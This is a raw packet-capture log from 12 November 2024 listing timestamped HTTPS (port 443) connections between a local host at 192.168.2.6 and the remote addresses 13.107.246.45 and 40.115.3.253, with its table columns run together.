                                                        Nov 12, 2024 16:27:17.354816914 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.367553949 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.367988110 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.367997885 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.369364023 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.369366884 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.370429993 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.371157885 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.371181965 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.372081995 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.372087955 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.406532049 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.407236099 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.407244921 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.408044100 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.408049107 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.484906912 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.485034943 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.485167980 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.485560894 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.485570908 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.485599041 CET49840443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.485604048 CET4434984013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.489685059 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.489698887 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.489767075 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.490140915 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.490153074 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.504195929 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.504550934 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.504592896 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.504663944 CET49841443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.504678011 CET4434984113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.508188963 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.508203983 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.508486032 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.508703947 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.508716106 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.508959055 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.509006977 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.509071112 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.509602070 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.509607077 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.509619951 CET49842443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.509623051 CET4434984213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.513144016 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.513153076 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.513223886 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.513441086 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.513452053 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.540817022 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.540867090 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.540952921 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.541203976 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.541214943 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.541224957 CET49843443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.541229963 CET4434984313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.544411898 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.544440985 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.544558048 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.544687033 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:17.544701099 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:17.813808918 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:17.813827991 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:17.813893080 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:17.816246986 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:17.816279888 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:18.069669962 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.070270061 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.070292950 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.070965052 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.070971012 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.201113939 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.201194048 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.201251030 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.201621056 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.201632977 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.201656103 CET49844443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.201661110 CET4434984413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.205271006 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.205315113 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.205398083 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.205549955 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.205558062 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.223932981 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.224383116 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.224407911 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.224911928 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.224916935 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.257100105 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.257613897 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.257622957 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.258130074 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.258132935 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.260224104 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.260576010 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.260586023 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.261042118 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.261045933 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.285342932 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.285835028 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.285855055 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.286362886 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.286370039 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.354136944 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.354696035 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.354985952 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.355191946 CET49845443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.355201006 CET4434984513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.362082005 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.362134933 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.362257957 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.363338947 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.363360882 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.390721083 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.390743971 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.390783072 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.390831947 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.390876055 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.391357899 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.391364098 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.391375065 CET49847443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.391379118 CET4434984713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.394689083 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.394715071 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.394886971 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.395164013 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.395178080 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.416935921 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.417000055 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.417212009 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.417511940 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.417527914 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.417547941 CET49848443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.417555094 CET4434984813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.420605898 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.420636892 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.420772076 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.421066046 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.421073914 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.430905104 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.431154013 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.431209087 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.431423903 CET49846443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.431430101 CET4434984613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.434246063 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.434257984 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.434446096 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.434848070 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.434859991 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.922943115 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:18.923024893 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:18.928965092 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:18.928980112 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:18.929193974 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:18.931356907 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:18.931356907 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:18.931372881 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:18.931602001 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:18.940965891 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.941406965 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.941430092 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.941941023 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:18.941948891 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:18.979336977 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:19.070822001 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.070847034 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.070908070 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.070909977 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.070970058 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.071247101 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.071268082 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.071288109 CET49850443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.071295977 CET4434985013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.074687958 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.074722052 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.074892044 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.075128078 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.075141907 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.113224030 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.113662958 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.113677025 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.114162922 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.114167929 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.115237951 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.115581036 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.115608931 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.115993023 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.115998030 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.155540943 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.155879021 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.155893087 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.156351089 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.156356096 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.178725004 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.179117918 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.179128885 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.179547071 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.179560900 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.179986954 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:19.180466890 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:19.180479050 CET4434984940.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:19.180510998 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:19.180536032 CET49849443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:19.244762897 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.244824886 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.244891882 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.245172977 CET49852443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.245188951 CET4434985213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.248250008 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.248321056 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.248395920 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.248717070 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.248750925 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.248821974 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.248876095 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.248894930 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.248905897 CET49851443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.248910904 CET4434985113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.249012947 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.249018908 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.251889944 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.251909018 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.251988888 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.252156973 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.252161980 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.288830996 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.288968086 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.289025068 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.289233923 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.289252043 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.289261103 CET49853443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.289266109 CET4434985313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.292587996 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.292614937 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.292675018 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.292854071 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.292861938 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.313838005 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.313860893 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.313899994 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.313925028 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.313962936 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.314182997 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.314192057 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.314202070 CET49854443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.314205885 CET4434985413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.317018032 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.317030907 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.317153931 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.317332029 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.317344904 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.812505007 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.813601017 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.813601017 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.813613892 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.813627958 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.944610119 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.944686890 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.944969893 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.944969893 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.945451975 CET49855443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.945470095 CET4434985513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.948169947 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.948211908 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.948303938 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.948496103 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.948509932 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.985578060 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.986242056 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.986263990 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:19.986496925 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:19.986500978 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.023369074 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.024491072 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.024511099 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.025010109 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.025013924 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.055910110 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.056739092 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.056751013 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.057214022 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.057219028 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.115216017 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.115387917 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.115859032 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.115905046 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.115905046 CET49857443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.115921021 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.115935087 CET4434985713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.122256041 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.122298956 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.122473001 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.126188040 CET49861443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.126200914 CET4434986113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.152792931 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.153038025 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.153111935 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.153209925 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.153209925 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.153381109 CET49858443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.153393030 CET4434985813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.158293962 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.158324957 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.158546925 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.159472942 CET49862443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.159486055 CET4434986213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.188020945 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.188081980 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.188349009 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.188349009 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.188385010 CET49859443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.188395977 CET4434985913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.194200993 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.194221020 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.198478937 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.198577881 CET49863443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.198591948 CET4434986313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.377247095 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.377924919 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.377939939 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.378487110 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.378490925 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.509582996 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.509932041 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.510108948 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.510108948 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.510143042 CET49856443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.510158062 CET4434985613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.513115883 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.513171911 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.513282061 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.513402939 CET49864443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.513420105 CET4434986413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.690594912 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.691180944 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.691200972 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.691720009 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.691725016 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.835588932 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.835652113 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.835710049 CET4434986013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:20.835804939 CET49860443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:20.835840940 CET49860443192.168.2.613.107.246.45
